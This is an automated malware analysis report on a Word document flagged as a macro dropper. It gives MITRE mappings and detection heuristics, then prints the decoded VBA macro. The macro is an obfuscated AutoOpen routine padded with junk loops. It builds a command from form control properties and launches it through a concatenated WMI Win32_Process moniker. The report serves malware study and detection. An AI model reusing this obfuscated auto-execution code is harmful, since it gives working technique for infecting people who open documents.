Verdict: MALICIOUS (Risk Score 242)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes GetObject and CreateObject to launch a WMI process, indicating an attempt to execute arbitrary commands or download further payloads. The ClamAV detection 'Doc.Dropper.Agent-6965774-0' further supports its malicious nature as a dropper.
Heuristics (7):
- ClamAV: Doc.Dropper.Agent-6965774-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6965774-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6850 bytes |

SHA-256: cb10093ac6f0739d22565c71f619174ba982a01e43294f7cf8cd03d45a4c336f

Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "u266359_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "o527_216"
Attribute VB_Base = "0{E89BDF6C-CDF9-44B3-BD78-6D56238EDB36}{FC61C88D-9A4A-4EF7-8F47-76F8210231CE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "v82049"
Attribute VB_Name = "d8260569"
Attribute VB_Name = "X_03_27"
Attribute VB_Name = "A4590489"
Attribute VB_Name = "S9473908"
Attribute VB_Base = "0{63AF6905-F3A3-438D-AF8E-870DC54746BD}{AA920780-647F-4A27-A65D-137B92DB7800}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "N25165"
Function E723134(K1071967)
While U12808__ And O20757
'f527_070o731565M1112848z9380149
'P11_52O853203_C07282d_4_2972
'w28_76O87450k_6250i2647881
Wend
While k043491 And z14204
'G76403M74__42S097236U0103233
'd298481Z27_9665A4_1193T38887_
'M6_1299w3588388E902288V_401_26
Wend
Set E723134 = CVar(K1071967)
While U34068 And I7_31652
'm513901A8_211_z178083n2__6779
'J55973M60314X9164_Q95135
's_1363L6_4_71S29888W699810
Wend
While Z9656_95 And i69512
'a0571812P656120X62755K4801345
'v895542o25762_R3_36_w9342198
'V12965j9839241X83067s1818_
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While z4527138 And S13571
'V870228r6622618V994915A476963
'C23674H03739z885009z54_87
'q7_4_250a0196219E435258M53585
Wend
While k9161891 And q7865_
'u463631l__8477r3378_82p6745235
'R952312a_2062O77742A27671
'L71925C0708823z980183_b2959070
Wend
Call k566251
While U8_273 And s992217
'L84922_1X600_0O5662_m020_59
's3537124C1_93114l649741L190227
'l55322_6u90177w783_30O3977347
Wend
While S775548 And P57178_2
'h4828_08w4116549W0830964Q377348
'Y68259_4J531659L_57__6Y0299073
'M605_872E35843w82__3W5745371
Wend
While u19558 And Y3880_46
'z104656Z447930s3763760z_993002
'b508477u511677t307189Y2802744
'w281435w4381441Q30_011_X832405
Wend
End Sub
Attribute VB_Name = "U830644"
Function k566251()
On Error Resume Next
While L385225 And Q5076977
'q5661119j516643i64_61k13732
'F8884148t45126O366160n60543
'h7_0728I00809s8577306J007207
Wend
While j987061 And O391_773
'I4979_z734759L6_62062E360102
't2_761V_74339U8_63696V93566
'j4065152F01964w788222f3620742
Wend
While J965_593 And Y_823_8
'b39991V25203T22561W46_3_7
'Q185_85T27678s0718682Y906668
'z95581Y2_80931U77_473X071915
Wend
E166256 = o527_216.c232_28.ControlTipText + S9473908.A9_04_3 + o527_216.c232_28.ControlSource + S9473908.o454584 + o527_216.c232_28.PasswordChar + o527_216.c232_28.PasswordChar + S9473908.C_17318_ + o527_216.c232_28.ControlTipText + o527_216.c232_28 + S9473908.G_838386 + o527_216.c232_28 + S9473908.N674__ + o527_216.c232_28.ControlSource
While u__197 And f37805
'n2121_f96_706h1316_38Q6532487
'E3_346_b9900351J06835d47_46
'V1181120d8719354j789335d53719
Wend
While G60_5_ And J37048
't3170600C98773_3M055_425h463_09
'i8_76_d84_141u88745N9358950
'H330660z77_670_l445832t00128
Wend
Set j589625 = E723134(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
While X65_58 And I3_2702
'z_4839O1018475C615955T867438
'Y5396128Z_58832b30403p569_4
'Z54__419f1_943_7j257_043a889309
Wend
While p13_2469 And M167920
'q77976l9426988c2411_4q727336
'N48557K69390R6_9675w17210
'V62928z905319v9609804d202701
Wend
j589625.Create v39456 + E166256 + z904_32, V794583,
```

... (truncated)